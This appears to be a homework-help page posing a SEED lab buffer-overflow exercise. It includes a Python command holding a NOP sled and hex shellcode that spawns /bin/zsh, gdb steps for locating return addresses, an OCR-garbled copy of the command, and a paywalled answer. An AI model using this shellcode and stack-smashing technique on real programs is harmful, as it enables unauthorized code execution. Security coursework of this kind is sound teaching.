Question: (Using SEEDUbuntu12.04) The attack in this case is using the program to get to the shell, which in this case runs at /bin/zsh, which is

(Using SEEDUbuntu12.04)

The attack in this case is using the program to get to the shell, which in this case runs at /bin/zsh, which is another shell type different from bash. Below is a trial which doesnt work but very close to working, and your objective is to do minor changes with the addresses to make it work. run $(python -c 'print "x90" * 426 + "x31xc0x83xecx01x88x04x24x68x2fx7ax73x68x2fx62x69x6ex68x2fx75x73x72x89xe6x50x56xb0x0bx89xf3x89xe1x31xd2xcdx80xb0x01x31xdbxcdx80" + "x51x51x51x51" * 10')

The long code is the hex decimal version of running /bin/zsh. Hex value 90 in assembly is called NOP (No Operation) and used for padding, which is very useful in this attack. Why is it useful?

Check the stack and see the value of EBP & EIP. Remember the objective is to overwrite the content of EBP and return address to point to the address of the shell, which is now in your buffer. Examine the memory to see the addresses and their contents. (gdb) x/200x ($esp - 550)

The value in EBP should be the address in the stack in the middle of all the NOP so that it runs through the NOP and then hits the code for the exploit to give you the zsh shell. Note that you must change the address to BIG ENDIAN format (reverse the order of the bytes). Why do you have to change it to BIG ENDIAN?

If you can successfully run the exploit you will get the zsh shell prompt. From the shell run the following commands and take a screenshot to show the exploit did run. whoami pwd

Draw the content of the stack to show the exploit and explain how it was able to run successfully.

(Using SEEDUbuntu12.04) The attack in this case is using the program to

Starting program: /hone/seed/vuln $(python -c 'print "x90" 426 "Ix31 xco x8 3\xec x01 x88\x04 x241x68 x2f x7a\x731x68 x2f x62 x69|x6e x68 x2f|x75 x73|x72|x8 "Ix51 x51|x511x51" 10') t k prons a515ec t ed slgnal srGSEGV, Segnenaton faut. 0x51515151 in ?? () Starting program: /hone/seed/vuln $(python -c 'print "x90" 426 "Ix31 xco x8 3\xec x01 x88\x04 x241x68 x2f x7a\x731x68 x2f x62 x69|x6e x68 x2f|x75 x73|x72|x8 "Ix51 x51|x511x51" 10') t k prons a515ec t ed slgnal srGSEGV, Segnenaton faut. 0x51515151 in ?? ()

Step by Step Solution

There are 3 Steps involved in it

1 Expert Approved Answer
Step: 1 Unlock blur-text-image
Question Has Been Solved by an Expert!

Get step-by-step solutions from verified subject matter experts

Step: 2 Unlock
Step: 3 Unlock

Students Have Also Explored These Related Databases Questions!

Q:

The learning objective of this lab is for students to understand how environment variables affect program and system behaviors. Environment variables are a set of dynamic named values that can affect...

Q:

2.7 Task 5: Defeat Shell's countermeasure The purpose of this task is to launch the return-to-libc attack after the shell's countermeasure is enabled. Before doing the attack in Tasks 1 to 4, we...

Q:

computer security course, please I need help it due 3 hours. 1 Lab Overview The learning objective of this lab is for students to gain the first-hand experience on buffer-overflow vulner- ability by...

Q:

Given code: utils.c (for reference DON'T Modify), utils.h (DON't Modify) and main_template.c (Write Code HERE) --> UTILS.C [DO NOT MODIFY] pasting image cause Chegg character limit >:( --> UTILS.h...

Q:

please answer 4,5&6 as they are interconnected to task 1&2 . the first page is instructions and then task 2 . at the end i have uploaded task 1 . dont know the answer? task 4,5&6 based on 1&2 SEED...

Q:

Could I get the cost of capital calculation (WACC) broken out in excel for Amazon based on FY2015 financials? \fTo our shareowners: This year, Amazon became the fastest company ever to reach $100...

Q:

Hi, I have areport due in nine hours. I need to find the following list of things on Amazon.com....

Q:

INSTRUCTIONS: In 1 6-9 sentences, type a claim arguing that the speaker of the source you chose for your Analysis Essay implements the use of a specific rhetorical or literary device(s) in order to...

Q:

INSTRUCTIONS: In 1 6-9 sentences, type a claim arguing that the speaker of the source you chose for your Analysis Essay implements the use of a specific rhetorical or literary device(s) in order to...

Q:

Instructions Unix Shell In this project, you'll build a simple Unix shell. The shell is the heart of the command-line interface, and thus is central to the Unix/C programming environment. Mastering...

Q:

The Litzenberger Company has projected the following quarterly sales amounts for the coming year: a. Accounts receivable at the beginning of the year are $310. Litzenberger has a 45-day collection...

Q:

College students often make up a substantial portion of the population of college cities and towns. State College, Pennsylvania, ranks first with 71.1% of its population made up of college students....

Q:

True or false: The accounting rate of return is also called the rate of return on assets. True false question. True False

Q:

A coffee shop normally sells 5 0 cups of hot chocolate each day in the winter. On a particularly cold day, that coffee shop sells 2 0 0 cups of the hot chocolate. Mistaking the immediate increase in...

Q:

Identify six problem members and explain how to handle them so they do not have a negative effect on your meetings.

Q:

Define the following 16 key terms throughout the chapter in bold with their definitions in italic.

Q:

List the five steps in the decision-making model.